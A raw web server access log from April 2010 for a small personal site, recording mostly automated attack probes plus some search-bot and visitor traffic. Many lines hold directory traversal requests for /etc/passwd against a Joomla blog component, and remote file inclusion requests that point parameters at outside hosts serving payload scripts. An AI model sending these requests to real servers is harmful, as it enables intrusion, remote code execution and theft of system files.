195.216.234.1 - - [25/Apr/2010:11:50:54 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
69.175.13.74 - - [25/Apr/2010:11:51:52 -0500] "GET /index.php?cct_base=http://avtek.org.ru/assets/docs/ts???? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
69.175.13.74 - - [25/Apr/2010:11:51:52 -0500] "GET /logs/index.php?cct_base=http://avtek.org.ru/assets/docs/ts???? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.55.207.28 - - [25/Apr/2010:11:52:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.179 - - [25/Apr/2010:11:54:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.176.226.186 - - [25/Apr/2010:11:54:37 -0500] "GET /index.php?cct_base=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.176.226.186 - - [25/Apr/2010:11:54:37 -0500] "GET /logs/index.php?cct_base=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.216.234.1 - - [25/Apr/2010:11:57:29 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
72.52.203.55 - - [25/Apr/2010:11:57:33 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
204.14.3.162 - - [25/Apr/2010:11:57:48 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
87.21.44.89 - - [25/Apr/2010:11:58:52 -0500] "GET /logs/access_log.1268956800//include/mail.inc.php?root=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.813"
87.21.44.89 - - [25/Apr/2010:11:58:52 -0500] "GET //include/mail.inc.php?root=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.813"
87.21.44.89 - - [25/Apr/2010:11:58:52 -0500] "GET /logs//include/mail.inc.php?root=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.813"
204.14.3.162 - - [25/Apr/2010:11:59:17 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
204.14.3.162 - - [25/Apr/2010:11:59:17 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
204.14.3.162 - - [25/Apr/2010:11:59:17 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
72.52.203.55 - - [25/Apr/2010:11:59:41 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
72.52.203.55 - - [25/Apr/2010:11:59:41 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
72.52.203.55 - - [25/Apr/2010:11:59:41 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
69.175.13.74 - - [25/Apr/2010:12:01:26 -0500] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://avtek.org.ru/assets/docs/ts???? HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
69.175.13.74 - - [25/Apr/2010:12:01:26 -0500] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://avtek.org.ru/assets/docs/ts???? HTTP/1.1" 200 3091 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
80.67.20.117 - - [25/Apr/2010:12:05:02 -0500] "GET /logs/access_log.1247270400/?sourcedir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
80.67.20.117 - - [25/Apr/2010:12:05:05 -0500] "GET /?sourcedir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
207.46.199.44 - - [25/Apr/2010:12:05:55 -0500] "GET /logs/access_log.1191024000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.80.122.44 - - [25/Apr/2010:12:06:39 -0500] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
66.221.63.33 - - [25/Apr/2010:12:08:04 -0500] "GET //order.php?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 282 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:12:08:04 -0500] "GET /logs//order.php?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 287 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:12:08:04 -0500] "GET /logs/access_log.1215648000//order.php?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 309 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:12:08:08 -0500] "GET //order.php?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 282 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:12:08:08 -0500] "GET /logs//order.php?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 287 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:12:08:08 -0500] "GET /logs/access_log.1265587200//order.php?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 309 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:12:08:08 -0500] "GET /logs/access_log.1264204800//order.php?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 309 "-""Mozilla/5.0"
67.195.112.180 - - [25/Apr/2010:12:09:31 -0500] "GET /logs/access_log.1189382400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.216.234.1 - - [25/Apr/2010:12:09:44 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
195.216.234.1 - - [25/Apr/2010:12:09:45 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.216.234.1 - - [25/Apr/2010:12:09:45 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
195.160.224.208 - - [25/Apr/2010:12:10:51 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
207.46.204.242 - - [25/Apr/2010:12:14:54 -0500] "GET /logs/access_log.1223424000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
198.170.128.142 - - [25/Apr/2010:12:16:52 -0500] "GET //SubProduct.php?*=' HTTP/1.1" 404 299 "-""libwww-perl/5.805"
110.45.147.246 - - [25/Apr/2010:12:19:30 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:12:19:30 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:12:19:30 -0500] "GET /logs/access_log.1262649600//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:12:19:38 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:12:19:38 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
110.45.147.246 - - [25/Apr/2010:12:19:41 -0500] "GET /logs/access_log.1262649600//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.114.174.53 - - [25/Apr/2010:12:19:52 -0500] "GET //include/write.php?dir=http://www.mytemple.co.kr/mart7/bbs/table/board7/upload/fid1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
210.114.174.53 - - [25/Apr/2010:12:19:52 -0500] "GET /logs/access_log.1220054400%20%20//include/write.php?dir=http://www.mytemple.co.kr/mart7/bbs/table/board7/upload/fid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
210.114.174.53 - - [25/Apr/2010:12:19:52 -0500] "GET /logs//include/write.php?dir=http://www.mytemple.co.kr/mart7/bbs/table/board7/upload/fid1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
81.176.226.186 - - [25/Apr/2010:12:20:10 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 302 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.176.226.186 - - [25/Apr/2010:12:20:10 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 307 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
79.174.78.178 - - [25/Apr/2010:12:20:42 -0500] "GET /skin/zae_schedule/ask_password.php?dir=http://mis.cmtc.ac.th/file/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
79.174.78.178 - - [25/Apr/2010:12:20:42 -0500] "GET /logs/skin/zae_schedule/ask_password.php?dir=http://mis.cmtc.ac.th/file/fx29id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
79.174.78.178 - - [25/Apr/2010:12:20:42 -0500] "GET /logs/access_log.1265500800/skin/zae_schedule/ask_password.php?dir=http://mis.cmtc.ac.th/file/fx29id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
121.78.118.123 - - [25/Apr/2010:12:20:45 -0500] "GET /appserv/main.php?appserv_root=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
121.78.118.123 - - [25/Apr/2010:12:20:45 -0500] "GET /logs/access_log.1271030400%20%20/appserv/main.php?appserv_root=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.78.118.123 - - [25/Apr/2010:12:20:45 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
121.78.118.123 - - [25/Apr/2010:12:20:55 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
121.78.118.123 - - [25/Apr/2010:12:20:55 -0500] "GET /appserv/main.php?appserv_root=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
121.78.118.123 - - [25/Apr/2010:12:20:55 -0500] "GET /logs/access_log.1271030400%20%20/appserv/main.php?appserv_root=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.175.13.74 - - [25/Apr/2010:12:21:18 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://avtek.org.ru/assets/docs/ts???? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
69.175.13.74 - - [25/Apr/2010:12:21:18 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://avtek.org.ru/assets/docs/ts???? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
79.174.78.178 - - [25/Apr/2010:12:23:04 -0500] "GET /logs/access_log.1262476800/skin/zae_schedule/ask_password.php?dir=http://mis.cmtc.ac.th/file/fx29id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
76.255.68.255 - - [25/Apr/2010:12:23:04 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:05 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:08 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:09 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:09 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:09 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:09 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:09 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:09 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:09 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:09 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:09 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:10 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:10 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:33 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
76.255.68.255 - - [25/Apr/2010:12:23:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
79.174.78.178 - - [25/Apr/2010:12:23:40 -0500] "GET /logs/access_log.1264032000/skin/zae_schedule/ask_password.php?dir=http://mis.cmtc.ac.th/file/fx29id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.13.74 - - [25/Apr/2010:12:24:03 -0500] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://avtek.org.ru/assets/docs/ts???? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
69.175.13.74 - - [25/Apr/2010:12:24:03 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://avtek.org.ru/assets/docs/ts???? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
195.160.224.208 - - [25/Apr/2010:12:24:26 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.160.224.208 - - [25/Apr/2010:12:24:27 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
195.160.224.208 - - [25/Apr/2010:12:24:27 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
202.72.242.242 - - [25/Apr/2010:12:25:03 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
79.174.78.178 - - [25/Apr/2010:12:26:08 -0500] "GET /logs/access_log.1262476800/skin/zae_schedule/ask_password.php?dir=http://mis.cmtc.ac.th/file/fx29id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
79.174.78.178 - - [25/Apr/2010:12:26:08 -0500] "GET /logs/skin/zae_schedule/ask_password.php?dir=http://mis.cmtc.ac.th/file/fx29id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
79.174.78.178 - - [25/Apr/2010:12:26:08 -0500] "GET /skin/zae_schedule/ask_password.php?dir=http://mis.cmtc.ac.th/file/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
79.174.78.178 - - [25/Apr/2010:12:26:08 -0500] "GET /logs/access_log.1264032000/skin/zae_schedule/ask_password.php?dir=http://mis.cmtc.ac.th/file/fx29id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
94.23.12.122 - - [25/Apr/2010:12:26:50 -0500] "GET /logs/access_log.1219708800%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
204.14.3.162 - - [25/Apr/2010:12:27:45 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
204.14.3.162 - - [25/Apr/2010:12:27:45 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
204.14.3.162 - - [25/Apr/2010:12:27:45 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
72.52.203.55 - - [25/Apr/2010:12:28:57 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.52.203.55 - - [25/Apr/2010:12:28:58 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
72.52.203.55 - - [25/Apr/2010:12:28:58 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
81.176.226.186 - - [25/Apr/2010:12:29:40 -0500] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.176.226.186 - - [25/Apr/2010:12:29:40 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.160.224.208 - - [25/Apr/2010:12:31:14 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
195.160.224.208 - - [25/Apr/2010:12:31:15 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
195.160.224.208 - - [25/Apr/2010:12:31:15 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
146.169.13.57 - - [25/Apr/2010:12:32:27 -0500] "GET //startdown.php?file=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
146.169.13.57 - - [25/Apr/2010:12:32:27 -0500] "GET /logs//startdown.php?file=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
146.169.13.57 - - [25/Apr/2010:12:32:27 -0500] "GET /logs/access_log.1270598400//startdown.php?file=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
146.169.13.57 - - [25/Apr/2010:12:33:10 -0500] "GET //startdown.php?file=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
146.169.13.57 - - [25/Apr/2010:12:33:10 -0500] "GET /logs//startdown.php?file=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
146.169.13.57 - - [25/Apr/2010:12:33:10 -0500] "GET /logs/access_log.1270598400//startdown.php?file=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.46.13.140 - - [25/Apr/2010:12:43:55 -0500] "GET /logs/access_log.1154995200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.235.124.15 - - [25/Apr/2010:12:52:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.15 - - [25/Apr/2010:12:52:43 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
69.175.97.154 - - [25/Apr/2010:12:53:05 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.175.97.154 - - [25/Apr/2010:12:53:05 -0500] "GET /logs/access_log.1240358400//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
